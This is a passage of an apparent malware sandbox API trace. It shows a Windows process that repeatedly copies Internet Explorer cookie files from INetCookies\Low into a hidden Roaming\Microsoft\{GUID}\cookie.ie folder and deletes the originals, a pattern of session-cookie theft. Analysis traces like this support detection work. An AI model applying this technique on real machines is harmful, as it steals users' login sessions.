"c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0251.905] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0251.905] StrChrW (lpStart="4YWCPPXN.txt", wMatch=0x74c005c) returned 0x0 [0251.905] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="4YWCPPXN.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\4YWCPPXN.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\4YWCPPXN.txt" [0251.905] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\4YWCPPXN.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\4ywcppxn.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\4YWCPPXN.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\4ywcppxn.txt"), bFailIfExists=0) returned 1 [0251.910] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\4YWCPPXN.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\4ywcppxn.txt")) returned 1 [0251.911] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0251.911] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0251.911] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0251.911] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0251.911] StrChrW (lpStart="Low\\4Z6UDYLY.txt", wMatch=0x74c005c) returned="\\4Z6UDYLY.txt" [0251.911] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0251.911] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0251.911] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0251.911] StrChrW (lpStart="4Z6UDYLY.txt", wMatch=0x74c005c) returned 0x0 [0251.911] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="4Z6UDYLY.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\4Z6UDYLY.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\4Z6UDYLY.txt" [0251.912] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\4Z6UDYLY.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\4z6udyly.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\4Z6UDYLY.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\4z6udyly.txt"), bFailIfExists=0) returned 1 [0251.993] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\4Z6UDYLY.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\4z6udyly.txt")) returned 1 [0251.995] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0251.995] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0251.995] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0251.995] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0251.995] StrChrW (lpStart="Low\\5AFMRGRY.txt", wMatch=0x74c005c) returned="\\5AFMRGRY.txt" [0251.995] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0251.995] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0251.995] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0251.995] StrChrW (lpStart="5AFMRGRY.txt", wMatch=0x74c005c) returned 0x0 [0251.995] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="5AFMRGRY.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\5AFMRGRY.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\5AFMRGRY.txt" [0251.995] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\5AFMRGRY.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\5afmrgry.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\5AFMRGRY.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\5afmrgry.txt"), bFailIfExists=0) returned 1 [0252.010] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\5AFMRGRY.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\5afmrgry.txt")) returned 1 [0252.011] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0252.011] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0252.011] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0252.011] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0252.011] StrChrW (lpStart="Low\\5ARQYMIV.txt", wMatch=0x74c005c) returned="\\5ARQYMIV.txt" [0252.011] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0252.011] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0252.011] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0252.011] StrChrW (lpStart="5ARQYMIV.txt", wMatch=0x74c005c) returned 0x0 [0252.011] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="5ARQYMIV.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\5ARQYMIV.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\5ARQYMIV.txt" [0252.011] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\5ARQYMIV.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\5arqymiv.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\5ARQYMIV.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\5arqymiv.txt"), bFailIfExists=0) returned 1 [0252.018] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\5ARQYMIV.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\5arqymiv.txt")) returned 1 [0252.019] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0252.019] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0252.019] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0252.019] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0252.019] StrChrW (lpStart="Low\\5AV8L20N.txt", wMatch=0x74c005c) returned="\\5AV8L20N.txt" [0252.019] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0252.019] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0252.019] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0252.019] StrChrW (lpStart="5AV8L20N.txt", wMatch=0x74c005c) returned 0x0 [0252.019] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="5AV8L20N.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\5AV8L20N.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\5AV8L20N.txt" [0252.020] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\5AV8L20N.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\5av8l20n.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\5AV8L20N.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\5av8l20n.txt"), bFailIfExists=0) returned 1 [0252.025] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\5AV8L20N.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\5av8l20n.txt")) returned 1 [0252.026] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0252.026] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0252.026] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0252.026] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0252.026] StrChrW (lpStart="Low\\5NWXN3UI.txt", wMatch=0x74c005c) returned="\\5NWXN3UI.txt" [0252.026] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0252.026] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0252.026] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0252.026] StrChrW (lpStart="5NWXN3UI.txt", wMatch=0x74c005c) returned 0x0 [0252.026] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="5NWXN3UI.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\5NWXN3UI.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\5NWXN3UI.txt" [0252.026] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\5NWXN3UI.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\5nwxn3ui.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\5NWXN3UI.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\5nwxn3ui.txt"), bFailIfExists=0) returned 1 [0252.031] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\5NWXN3UI.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\5nwxn3ui.txt")) returned 1 [0252.032] lstrcpyW (in: lpString1=0x7aae530, 